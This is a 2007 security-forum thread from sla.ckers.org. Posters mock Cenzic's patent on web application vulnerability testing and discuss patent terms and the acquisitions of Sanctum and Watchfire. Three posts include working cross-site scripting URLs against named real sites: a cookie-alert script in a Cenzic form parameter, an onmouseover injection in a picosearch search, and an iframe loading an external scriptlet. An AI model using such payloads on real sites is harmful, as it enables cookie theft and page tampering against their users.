Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
If you have some interesting news or want to throw up a link to discuss it, here's the place. Anything is okay, even shameless vendor launches (since that is often applicable to what we work on). 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Cenzic Patent fun!
Posted by: zeno
Date: June 18, 2007 09:27PM

http://www.cgisecurity.com/2007/06/15


UGH

Options: ReplyQuote
Re: Cenzic Patent fun!
Posted by: Anonymous User
Date: June 19, 2007 05:24AM

So now we must pay royalties on each pentest we do? ^^ haha yeah right, could be fun.

Options: ReplyQuote
Re: Cenzic Patent fun!
Posted by: Kyran
Date: June 19, 2007 07:40AM

Just what I need! More legal troubles. :(

- Kyran

Options: ReplyQuote
Re: Cenzic Patent fun!
Posted by: Anonymous User
Date: June 19, 2007 10:30AM

Patent this Cenzic: http://www.cenzic.com/forms/hailstorm.php?id=3&camp=\%22%3Exx<script>alert(document.cookie);</script><"


*sigh* great company! ^^

Options: ReplyQuote
Re: Cenzic Patent fun!
Posted by: Anonymous User
Date: June 19, 2007 10:34AM

@Ronald: Yep - the contact form is also full with XSS

<edit>and their search too:

http://www.picosearch.com/cgi-bin/ts.pl?index=229422&calln=5&lastq=&sortsel=%22%20onmouseover=%22alert('greetings!')%22%20b=%22&opt=ANY&doc0=20&query=xss
(mouseover the search pagination)
</edit>



Edited 2 time(s). Last edit at 06/19/2007 10:43AM by .mario.

Options: ReplyQuote
Re: Cenzic Patent fun!
Posted by: mitmwatcher
Date: June 19, 2007 01:27PM

Guys take a look at this
http://intellectualweapons.com/

-Mitmwatcher

Options: ReplyQuote
Re: Cenzic Patent fun!
Posted by: thrill
Date: June 19, 2007 03:49PM

Sounds a bit fishy to me. I think complete humiliation of the vendor that refused to work with me would be worth a lot more than the $20 I might end up getting from them. ;)

mitmwatcher Wrote:
-------------------------------------------------------
> Guys take a look at this
> http://intellectualweapons.com/
>
> -Mitmwatcher

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Options: ReplyQuote
Re: Cenzic Patent fun!
Posted by: Anonymous User
Date: June 19, 2007 04:06PM

Great business model: Sell vulns for a 90/10 share ^^

Options: ReplyQuote
Re: Cenzic Patent fun!
Posted by: Anonymous User
Date: June 20, 2007 05:26AM

if... there'll be a share

Options: ReplyQuote
Re: Cenzic Patent fun!
Posted by: digi7al64
Date: June 25, 2007 12:01AM

If we use this product and it doesn't pick on a particular "fault" vector are we entitled to sue for misrepresentation in that they (cenzic) by there own admission stated that they retain the right to all fault tests and therefore under patent law should be able to ensure without failure they know every single aspect of there patent.

Also, and perhaps most interesting in this patent is from what i read in zeno's article is that possibly every website that uses querystrings/forms in there applications could by default be seen to be encroaching on the patent. However this is not the case and therefore it would appear that the patent relies on the scanners purpose in relation to covering the patent.

Therefore I suggest rather then have a "scanning application tool" you simply re brand your "scanning application tool" into a "website mapping analysis tool" which simply sends millions of malformed requests to the server in order to correctly identify and analyzer the site layout.

btw:
@ronald - great work on the xss, i guess we can put Cenzic into our box of scanning companies that don't have clue and can't protect their own site...oh wait whats that.. its a honeypot 10 years in the making set up to trick ronald...

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: Cenzic Patent fun!
Posted by: Anonymous User
Date: June 25, 2007 06:46AM

Yeah it only has symbolic value, I mean c'mon ^^, if you are a webappsec company, the least thing you can do is to patch all holes in your own site, check it again, re-check it until you are sure.

I get hit with tons of scanners a day, Acuntix ones, libwww-perl bots etc. none was able to find 1 XSS hole in any of my sites. I'm actually a bit insulted that they even tried. And yes I log every request, I know when someone enters a single quote only in any of my sites, nothing escapes my attention, and so a lot are blocked as a result, mostly the automated ones. So I know people try and most of the time they try when I publish something like this, ah the joy of seeing the strugle. :)

Options: ReplyQuote
Re: Cenzic Patent fun!
Posted by: rsnake
Date: June 26, 2007 07:57PM

Companies often patent things right before they try to get bought. It makes them have a stronger position, and makes their competitors a harder acquisition target. If any of you were around when Sanctum was about to get bought you will remember the idiocy of patenting going on there as well.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Cenzic Patent fun!
Posted by: fyoung
Date: June 26, 2007 09:08PM

rsnake Wrote:
-------------------------------------------------------
> Companies often patent things right before they
> try to get bought. It makes them have a stronger
> position, and makes their competitors a harder
> acquisition target. If any of you were around
> when Sanctum was about to get bought you will
> remember the idiocy of patenting going on there as
> well.


Watchfire was just purchased by IBM a few weeks back, though they didn't try to patent the wheel.

Options: ReplyQuote
Re: Cenzic Patent fun!
Date: June 27, 2007 12:35AM

Did they apply for a patent, or received one from a previous submittal? Patents are only good for 7 years anyway.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: Cenzic Patent fun!
Posted by: dev80
Date: June 27, 2007 09:54AM

@fyoung: Oh?

Sanctum acquired by Watchfire acquired by IBM

System for determining web application vulnerabilities
http://www.patentstorm.us/patents/6584569-fulltext.html

and for a breakdown:

Web Application Penetration Testing Methodology Patent
http://seclists.org/webappsec/2004/q1/0023.html



@Awesome AnDrEw:
"In Canada, a patent lasts 20 years from the date of application, for applications filed since 1 October 1989. In the United States, the term is also 20 years from the date of the first filed U.S. application; however, for applications filed since 29 May 2000, the term may be extended based on any delays in issuance of the patent caused by the U.S. Patent and Trademark Office."
http://www.parteqinnovations.com/randi-faq.html

Options: ReplyQuote
Re: Cenzic Patent fun!
Posted by: fyoung
Date: June 27, 2007 10:44AM

dev80 Wrote:
-------------------------------------------------------
> @fyoung: Oh?
>
> Sanctum acquired by Watchfire acquired by IBM

I stand corrected.

Options: ReplyQuote
Re: Cenzic Patent fun!
Posted by: Anonymous User
Date: June 28, 2007 12:24AM

I have another patent for them: http://www.cenzic.com/products_services/download_hailstorm.php?camp=%22%3E%3Ciframe%20src=http://ha.ckers.org/scriptlet.html%20%3C

Maybe you should patent them XSS sheet Robert. ^^

Options: ReplyQuote
Re: Cenzic Patent fun!
Date: June 28, 2007 01:06AM

When I took Accounting in college I could have sworn we learned that patents were only valid for 7 years. Oh well. I do most of my work by "hand" anyway so screw them.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote


Sorry, only registered users may post in this forum.